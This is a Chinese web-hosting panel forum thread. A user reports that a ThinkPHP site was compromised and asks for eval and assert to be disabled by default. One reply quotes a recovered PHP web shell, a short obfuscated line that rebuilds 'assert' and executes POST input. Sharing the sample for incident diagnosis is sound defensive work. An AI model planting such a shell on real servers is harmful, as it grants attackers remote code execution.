当前位置:论坛首页 > Linux面板 > 建议

【已完成】PHP 安装禁用 函数 eval,assert,

发表在 Linux面板2019-7-22 14:53 [复制链接] 7 6245

PHP 安装禁用 函数 eval,assert, 默认禁用这2个方法,,我已经被这个函数后台被入侵了,

使用道具 举报 只看该作者 回复
发表于 2019-7-22 15:58:09 | 显示全部楼层
您好,默认是没有禁用这两个函数的,您怎么确定是这两个函数入侵的
使用道具 举报 回复 支持 反对
发表于 2019-7-22 18:10:01 | 显示全部楼层
大炮运维V587 发表于 2019-7-22 15:58
您好,默认是没有禁用这两个函数的,您怎么确定是这两个函数入侵的

用的 tp5.1 根目录不知道怎么就多了一堆的php文件,,然后打开看.就是用用的这2个函数,释放了.,脚步,把我的,的首页全部跳转到钓鱼网站了.,,一开始没发现这个问题,只是简单的清除了.html JS.但是没过多久没出来了.,清除了这些奇怪的PHP文件,就没事了.,,

系统日志有一些报错记录

使用道具 举报 回复 支持 反对
发表于 2019-7-22 18:11:12 | 显示全部楼层

部分日志

部分日志



使用道具 举报 回复 支持 反对
发表于 2019-7-22 18:21:20 | 显示全部楼层
大炮运维V587 发表于 2019-7-22 15:58
您好,默认是没有禁用这两个函数的,您怎么确定是这两个函数入侵的

暂时没找到真正的漏洞,禁用了这2个,简单的阻挡了一下..,这是其中的某一个.
  1. <?php print(md5(222));$a=str_replace("vbnm","","asvbnmsert");@$a($_POST[qazw]);?>
复制代码


使用道具 举报 回复 支持 反对
发表于 2019-7-23 10:40:36 | 显示全部楼层
宝塔用户_goaocg 发表于 2019-7-22 18:21
暂时没找到真正的漏洞,禁用了这2个,简单的阻挡了一下..,这是其中的某一个.

有去thinkphp官方论坛去找最近的漏洞更新这一块的帖子或者新闻吗?看下是不是要更新下你的框架
使用道具 举报 回复 支持 反对
发表于 2023-6-20 03:00:50 | 显示全部楼层
我想请问下,既然你们做出一个工具出来,工具其实各种问题,其实是你们系统不兼容导致一堆漏洞。
漏洞你们搞出来吧
使用道具 举报 回复 支持 反对
发表于 2023-11-8 16:52:07 | 显示全部楼层
同样被利用assert函数攻击了
使用道具 举报 回复 支持 反对
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

普通问题处理

论坛响应时间:72小时

问题处理方式:排队(仅解答)

工作时间:白班:9:00 - 18:00

紧急运维服务

响应时间:3分钟

问题处理方式:宝塔专家1对1服务

工作时间:工作日:9:00 - 18:30

宝塔专业团队为您解决服务器疑难问题

点击联系技术免费分析
快速回复 返回顶部 返回列表